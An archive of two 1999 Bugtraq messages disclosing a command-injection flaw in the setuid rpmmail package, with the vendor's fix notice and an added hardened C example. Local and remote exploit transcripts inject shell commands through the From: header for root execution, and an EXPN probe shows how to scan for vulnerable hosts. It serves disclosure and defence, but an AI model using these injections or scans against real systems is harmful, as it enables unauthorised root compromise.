4367218 1999-10-05 22:34 /107 lines/ Postmaster
Recipient: Bugtraq (import) <8071>
Subject: RH6.0 local/remote command execution
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Message-ID: <19991005060406.4578.qmail@nwcst277.netaddress.usa.net>
Date: Tue, 5 Oct 1999 00:04:06 MDT
Reply-To: Brock Tellier <btellier@USA.NET>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Brock Tellier <btellier@USA.NET>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by samantha.lysator.liu.se id WAA13537

Greetings,

A vulnerability exists in the rpmmail package distributed on the Red Hat 6.0
Extra Applications CD. The potential compromise for this bug could be remote
or local root or simply remote command execution as "nobody" or similar,
depending on your system configuration.

By sending a carefully crafted mail message to rpmmail@vulnerablehost, you can
get /home/rpmmail/rpmmail (suid root by default, exec'd by .forward remotely)
to system(3) any command you wish. The command executed does not necessarily
have root privs because of bash's handling of euid != uid of caller. Although
system(3) calls /bin/sh -c, it is linked by default (can anyone verify
these?) on some Linux systems, such as SuSE 6.2, to /bin/bash v2. From the
system(3) man page:

    system() will not, in fact, work properly from programs
    with suid or sgid privileges on systems on which
    /bin/sh is bash version 2, since bash 2 drops privileges
    on startup. (Debian uses a modified bash which does not
    do this when invoked as sh.)

Thus some systems with rpmmail installed are vulnerable to local/remote root,
all others to remote command execution as an unpriv'd user.
The local exploit is as follows:

/bin/sh is linked to /bin/bash (default SuSE 6.2 behavior):

bash-2.03$ ls -la /bin/sh
lrwxrwxrwx 1 root root 9 Oct 5 11:27 /bin/sh -> /bin/bash
bash-2.03$ cat /etc/SuSE-release;uname -a;id
SuSE Linux 6.2 (i386)
VERSION = 6.2
Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
uid=100(xnec) gid=100(users) groups=100(users)
bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah
Could not open config file!
sh: Y: command not found
uid=100(xnec) gid=100(users) groups=100(users)
Could not open acknowledge file!
bash-2.03$

----

After linking /bin/sh to /bin/ksh instead:

bash-2.03$ ls -la /bin/sh
lrwxrwxrwx 1 root root 8 Oct 5 11:09 /bin/sh -> /bin/ksh
bash-2.03$ cat /etc/SuSE-release;uname -a;id
SuSE Linux 6.2 (i386)
VERSION = 6.2
Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
uid=100(xnec) gid=100(users) groups=100(users)
bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah
Could not open config file!
sh: Y: not found
uid=100(xnec) gid=100(users) euid=0(root) egid=0(root) groups=100(users)
Could not open acknowledge file!
bash-2.03$

The remote exploit is merely:

bash-2.03$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:31:13 -0500 (CDT)
MAIL FROM: ;/command/to/execute;
250 <;/command/to/execute;> ... Sender Okay
RCPT TO: rpmmail
250 <rpmmail> ... Recipient Okay
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit

A remote scan of vulnerable hosts for this problem would be simple as well,
since EXPN can be used to verify the existence of the .forward file:

220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:38:44 -0500 (CDT)
EXPN rpmmail
250 "| /home/rpmmail/rpmmail -c /home/rpmmail/rpmmail.conf"

Brock Tellier
UNIX Systems Administrator

____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1

(4367218) -----------------------------------

4370924 1999-10-06 22:42 /158 lines/ Postmaster
Recipient: Bugtraq (import) <8097>
Subject: Fwd: [Re: RH6.0 local/remote command execution]
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Mime-Version: 1.0
Message-ID: <19991006160444.10936.qmail@nwcst312.netaddress.usa.net>
Date: Wed, 6 Oct 1999 10:04:42 MDT
Reply-To: Brock Tellier <btellier@USA.NET>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Brock Tellier <btellier@USA.NET>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Forwarded Message:

Received: from smtp7.atl.mindspring.net [207.69.128.51] by nm195 via mtad (2.6) with ESMTP id 831DJFoYu0173M19; Wed, 06 Oct 1999 14:50:20 GMT
Received: from brian (user-2ivf8f4.dialup.mindspring.com [165.247.161.228]) by smtp7.atl.mindspring.net (8.8.5/8.8.5) with SMTP id KAA16515 for <btellier@USA.NET>; Wed, 6 Oct 1999 10:50:13 -0400 (EDT)
Message-Id: <3.0.5.32.19991006105034.007c4100@pop.mindspring.com>
X-Sender: bkgold@pop.mindspring.com (Unverified)
X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32)
Date: Wed, 06 Oct 1999 10:50:34 -0400
To: Brock Tellier <btellier@USA.NET>
From: Brian Gold <bgold@reedycreek.com>
Subject: Re: RH6.0 local/remote command execution
In-Reply-To: <3.0.5.32.19991005161929.00937100@pop.mindspring.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

Hi Brock,

Thanks for pointing out the vulnerability problem with our rpmmail package.
We have fixed this problem and posted new versions on our FTP site (below).
If you get a chance please put this version through your testing process.
We are grateful to people like you who help us in our ongoing effort to
produce quality, bug-free software.

ftp://reedycreek.com/reedycreek/rpmmaildemo/rpmmail-1.4.tar.gz
or
ftp://reedycreek.com/reedycreek/rpmmaildemo/rpmmail-1.4-2.i386.rpm

At 04:19 PM 10/5/99 -0400, you wrote:
>Greetings,
>
>A vulnerability exists in the rpmmail package distributed on the Red Hat 6.0
>Extra Applications CD.
>The potential compromise for this bug could be remote
>or local root or simply remote command execution as "nobody" or similar,
>depending on your system configuration.
>
>By sending a carefully crafted mail message to rpmmail@vulnerablehost, you can
>get /home/rpmmail/rpmmail (suid root by default, exec'd by .forward remotely)
>to system(3) any command you wish. The command executed does not necessarily
>have root privs because of bash's handling of euid != uid of caller. Although
>system(3) calls /bin/sh -c, it is linked by default (can anyone verify
>these?) on some Linux systems, such as SuSE 6.2, to /bin/bash v2. From the
>system(3) man page:
>
>    system() will not, in fact, work properly from programs
>    with suid or sgid privileges on systems on which
>    /bin/sh is bash version 2, since bash 2 drops privileges
>    on startup. (Debian uses a modified bash which does not
>    do this when invoked as sh.)
>
>Thus some systems with rpmmail installed are vulnerable to local/remote root,
>all others to remote command execution as an unpriv'd user.
>
>The local exploit is as follows:
>
>/bin/sh is linked to /bin/bash (default SuSE 6.2 behavior):
>bash-2.03$ ls -la /bin/sh
>lrwxrwxrwx 1 root root 9 Oct 5 11:27 /bin/sh -> /bin/bash
>bash-2.03$ cat /etc/SuSE-release;uname -a;id
>SuSE Linux 6.2 (i386)
>VERSION = 6.2
>Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
>uid=100(xnec) gid=100(users) groups=100(users)
>bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah
>Could not open config file!
>sh: Y: command not found
>uid=100(xnec) gid=100(users) groups=100(users)
>Could not open acknowledge file!
>bash-2.03$
>
>----
>
>After linking /bin/sh to /bin/ksh instead:
>
>bash-2.03$ ls -la /bin/sh
>lrwxrwxrwx 1 root root 8 Oct 5 11:09 /bin/sh -> /bin/ksh
>bash-2.03$ cat /etc/SuSE-release;uname -a;id
>SuSE Linux 6.2 (i386)
>VERSION = 6.2
>Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
>uid=100(xnec) gid=100(users) groups=100(users)
>bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah
>Could not open config file!
>sh: Y: not found
>uid=100(xnec) gid=100(users) euid=0(root) egid=0(root) groups=100(users)
>Could not open acknowledge file!
>bash-2.03$
>
>
>
>The remote exploit is merely:
>bash-2.03$ telnet localhost 25
>Trying 127.0.0.1...
>Connected to localhost.
>Escape character is '^]'.
>220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:31:13 -0500
>(CDT)
>MAIL FROM: ;/command/to/execute;
>250 <;/command/to/execute;> ... Sender Okay
>RCPT TO: rpmmail
>250 <rpmmail> ... Recipient Okay
>data
>354 Enter mail, end with "." on a line by itself
>
>

Brian Gold
Reedy Creek Technologies, Inc.
Voice: (919) 934-6869 Ext. 124
Fax: (919) 934-1537
bgold@reedycreek.com
http://www.reedycreek.com/

(4370924) -----------------------------------
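The defect the first message describes is a setuid mail handler that splices the From: address into a system(3) command line, so a ';' in the address is executed by /bin/sh. The following is an added example written for this archive; it is not rpmmail's code, not the vendor's 1.4 fix, and not part of either message. It shows the shape a hardened acknowledgement routine takes: the address is parsed out of the header, checked against a conservative whitelist, privileges are dropped permanently, and the address is handed to sendmail as a separate argv element via execv so no shell ever sees it. The sendmail path, the function names and the sample header lines are assumptions for illustration.

```c
/* Added example (not rpmmail's code, not from either message).
 * Shell-free, validated handling of a From: header for a setuid mail helper.
 *
 * The reported pattern is, in outline:
 *     snprintf(cmd, sizeof cmd, "... %s ...", from_header);  then  system(cmd);
 * where ';' or other shell metacharacters in the address become commands.
 * Everything below avoids that: whitelist the address, drop privileges,
 * exec directly. File paths are assumptions for illustration.
 */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <sys/wait.h>
#include <unistd.h>

#define MAX_ADDR 255

/* Accept only a conservative addr-spec: local-part "@" domain built from
 * alphanumerics and ".-_+". Anything a shell could interpret is rejected. */
int is_safe_address(const char *addr)
{
    size_t len = strlen(addr);
    if (len == 0 || len > MAX_ADDR)
        return 0;
    const char *at = strchr(addr, '@');
    if (at == NULL || at == addr || at[1] == '\0' || strchr(at + 1, '@') != NULL)
        return 0;
    for (const char *p = addr; *p; p++) {
        unsigned char c = (unsigned char)*p;
        if (!(isalnum(c) || c == '@' || c == '.' || c == '-' || c == '_' || c == '+'))
            return 0;
    }
    /* must start alphanumeric (so it can never look like an option to sendmail),
     * no leading/trailing dot in either part, no empty label */
    if (!isalnum((unsigned char)addr[0]) || at[-1] == '.' || at[1] == '.' ||
        addr[len - 1] == '.' || strstr(addr, "..") != NULL)
        return 0;
    return 1;
}

/* Pull the address out of a "From:" header line, accepting both
 * "From: user@host" and "From: Name <user@host>".
 * Returns 0 and fills out[] on success, -1 otherwise. */
int parse_from_header(const char *line, char *out, size_t outlen)
{
    if (strncasecmp(line, "From:", 5) != 0)
        return -1;
    const char *p = line + 5;
    while (*p == ' ' || *p == '\t')
        p++;
    const char *start, *end;
    const char *lt = strchr(p, '<');
    if (lt != NULL) {
        const char *gt = strchr(lt, '>');
        if (gt == NULL)
            return -1;
        start = lt + 1;
        end = gt;
    } else {
        start = p;
        end = p + strlen(p);
        while (end > start && isspace((unsigned char)end[-1]))
            end--;
    }
    size_t n = (size_t)(end - start);
    if (n == 0 || n >= outlen)
        return -1;
    memcpy(out, start, n);
    out[n] = '\0';
    return 0;
}

/* Hardened acknowledgement: validate, give up any setuid privilege for good,
 * then pass the address to sendmail as its own argv element via execv.
 * No shell is involved, so metacharacters carry no meaning.
 * Returns the child's exit status, or -1 if the address was rejected or
 * the process could not be set up. */
int notify_sender_safe(const char *from)
{
    if (!is_safe_address(from))
        return -1;
    if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
        return -1;                      /* refuse to continue as root */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "/usr/sbin/sendmail", (char *)from, NULL };
        execv(argv[0], argv);
        _exit(127);                     /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* constructed sample header lines; the second is the shape from the report */
    const char *lines[] = { "From: Alice Example <alice@example.org>",
                            "From: ;/usr/bin/id;" };
    char addr[MAX_ADDR + 1];
    for (size_t i = 0; i < sizeof lines / sizeof lines[0]; i++)
        if (parse_from_header(lines[i], addr, sizeof addr) == 0)
            printf("%-42s -> %s\n", lines[i], is_safe_address(addr) ? "accepted" : "rejected");
    return 0;
}
```

Two points in the design matter beyond the whitelist. Dropping privileges with setuid(getuid()) before any attacker-influenced data is touched removes the dependence on which shell /bin/sh happens to be, which is exactly the distinction the first message draws between bash 2 and ksh. And the EXPN response quoted in the report is worth remembering from the defender's side: an MTA that answers EXPN with the .forward pipe command advertises both the handler's path and its arguments, so disabling EXPN (for sendmail, PrivacyOptions=noexpn) narrows what a scan can learn.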